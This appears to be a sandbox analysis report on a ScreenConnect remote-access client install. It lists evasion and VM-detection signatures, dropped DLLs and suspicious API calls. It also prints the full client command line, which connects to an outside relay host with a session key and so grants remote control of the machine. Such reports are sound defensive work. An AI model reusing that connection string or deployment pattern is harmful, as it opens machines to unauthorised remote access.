Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Memory allocated: 980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Memory allocated: 1A380000 memory reserve \| memory write watch	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1608.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI17AE.tmp	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe TID: 7696	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe TID: 7936	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7888	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: svchost.exe, 00000008.00000002.2942015906.0000017F93258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2940590686.0000017F8DC2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.0000000005508000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (3a24aebb8959bcfa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=instance-xkznvd-relay.screenconnect.com&p=443&s=e3b17808-f02f-4082-a0ad-0ef89097505d&k=bgiaaackaabsu0exaagaaaeaaqbhw2nfb6zupkledihhdvtayuyd858sihfxvlo7ouduhfiakfl%2fps5vluffi688c%2ffi5cxvcjgfshxpqsjscre%2bvzhksrm%2bteue97q6nbz5oegi61hdzk9%2bjy6drnqvjn5o3w4r13ztthxrqvi92kieihsqur1j2%2fl4cjo7mr%2btf3z2fvvhba9ai44ir3hx7t6ycekwsxigwsjwulu6qmsua0yoa6ak5ubrkh%2fug0gs3wbetgsualtj1hdchea2xrvqmqyiwf1moawexddmh4ktymunwgxslao6chtqtobuldnoq2rzutbk681gaiktevzer9dayt7dfk5ghsogr7cx&c=envioparaiba20%2f10&c=&c=&c=&c=&c=&c=&c="

Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
